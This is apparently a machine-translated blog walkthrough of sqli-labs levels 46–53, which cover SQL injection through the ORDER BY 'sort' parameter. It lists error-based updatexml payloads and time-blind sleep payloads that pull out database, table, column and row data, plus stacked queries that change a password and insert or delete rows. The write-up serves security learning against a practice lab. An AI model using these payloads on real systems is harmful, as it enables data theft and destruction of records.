当前位置:网站首页>SQL Lab (46~53) (continuous update later) order by injection
SQL Lab (46~53) (continuous update later) order by injection
2022-07-07 12:24:00 【hcjtn】
(46~50)
sql-lab-46
As soon as you enter 46 Close the page and prompt us to use sort :
We try to use this ?sort=1 Find out :
then ?sort=2:
?sort=3:
We found that when we use sort=1 when The table is arranged in the first column ,sort=2 when The table is arranged in the second column , sort=3 when The table is sorted in the third column . We thought about it order by function , Guess may be related to order by Function related injection .
View source code :
$sql = "SELECT * FROM users ORDER BY $id";
We found that our guess was indeed right .
Let's get to know order by Parameter injection :
order by Injection means that the following parameters are controllable ,
order by It's different from what we're doing here where Injection point after , Out of commission union Isoinjection , Then you can follow An error injection perhaps Time blind note .
Judge database name :?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
Name of judgment table :?sort=-1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q
Judge the listing :?sort=-1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q
Query data :?sort=-1 and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q
sql-lab-47
Principle and 46 It's the same , The difference is only closed difference
Judge database name :?sort=-1 'and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
Name of judgment table :?sort=-1 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q
Judge the listing :?sort=-1’and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q
Query data :?sort=-1 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q
sql-lab-48
Only time blind injection can be used in this level :
Use time blind injection
Resolve database name :?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s
Resolve table name :?sort=1 and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :?sort=1 and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
get data : ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q
sql-lab-49
The same as the forty-eight level , It's just the difference in the way of closure
Resolve database name :?sort=1 'and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s
Resolve table name :?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :?sort=1’and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
get data : ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q
sql-lab-50
Enter the topic , I found that it is quite different from the previous questions , The sentences we input will still be spliced into order by Back , So try to use error injection , Discovery is indeed possible , So what's the difference between this question and the previous one ?
Let's look at the source code :
mysqli_multi_query($con1, $sql)
So this problem is stack injection and order by Injected combination
?sort=1;update users set password=‘hcjtn’ where id=14–q
?sort=1;insert into users values(50,‘50’,‘50’)-- q
(51~53)
sql-lab51
The practice is consistent with the previous question , It's just a closed difference .
Use error injection or time blind injection :
Error injection is used here :
Judge database name :?sort=-1 'and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
Name of judgment table :?sort=-1 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q
Judge the listing :?sort=-1’and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q
Query data :?sort=-1 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q
Then stack injection :
?sort=1’;insert into users values(21,‘02’,‘24’)-- q
sql-lab-52
The same routine, the same method , First judge the closing mode It is found that the question is not closed , Then try to use error reporting , Pop up the library name , Found to be unusable , Then we can only use time blind annotation in this topic :
Resolve database name :?sort=1’and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s
Resolve table name :?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :?sort=1’and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
get data : ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q
Then stack injection :
?sort=1 ;delete from users where id=50 – q
sql-lab-53
First judge the closing mode , Found no closure .
Resolve database name :?sort=1 'and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s
Resolve table name :?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :?sort=1 'and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
get data : ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q
Then stack injection :
?sort=1’ ;delete from users where id=50 – q
边栏推荐
- DOM parsing XML error: content is not allowed in Prolog
- EPP+DIS学习之路(1)——Hello world!
- Zero shot, one shot and few shot
- Swiftui swift internal skill how to perform automatic trigonometric function calculation in swift
- 超标量处理器设计 姚永斌 第10章 指令提交 摘录
- zero-shot, one-shot和few-shot
- 让数字管理好库存
- 软件内部的定时炸弹:0-Day Log4Shell只是冰山一角
- Matlab implementation of Huffman coding and decoding with GUI interface
- Superscalar processor design yaoyongbin Chapter 8 instruction emission excerpt
猜你喜欢
wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
Review and arrangement of HCIA
Introduction and application of smoothstep in unity: optimization of dissolution effect
千人规模互联网公司研发效能成功之路
Sign up now | oar hacker marathon phase III midsummer debut, waiting for you to challenge
110.网络安全渗透测试—[权限提升篇8]—[Windows SqlServer xp_cmdshell存储过程提权]
Tutorial on principles and applications of database system (010) -- exercises of conceptual model and data model
Epp+dis learning road (2) -- blink! twinkle!
108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]
数据库系统原理与应用教程(007)—— 数据库相关概念
随机推荐
Idea 2021 Chinese garbled code
问题:先后键入字符串和字符,结果发生冲突
[texture feature extraction] LBP image texture feature extraction based on MATLAB local binary mode [including Matlab source code 1931]
Simple network configuration for equipment management
Xiaohongshu microservice framework and governance and other cloud native business architecture evolution cases
Processing strategy of message queue message loss and repeated message sending
Several methods of checking JS to judge empty objects
[data clustering] realize data clustering analysis based on multiverse optimization DBSCAN with matlab code
About web content security policy directive some test cases specified through meta elements
<No. 8> 1816. 截断句子 (简单)
(待会删)yyds,付费搞来的学术资源,请低调使用!
Solutions to cross domain problems
软件内部的定时炸弹:0-Day Log4Shell只是冰山一角
Time bomb inside the software: 0-day log4shell is just the tip of the iceberg
千人规模互联网公司研发效能成功之路
《看完就懂系列》天哪!搞懂节流与防抖竟简单如斯~
浅谈估值模型 (二): PE指标II——PE Band
金融数据获取(三)当爬虫遇上要鼠标滚轮滚动才会刷新数据的网页(保姆级教程)
解决 Server returns invalid timezone. Go to ‘Advanced’ tab and set ‘serverTimezone’ property manually
Superscalar processor design yaoyongbin Chapter 10 instruction submission excerpt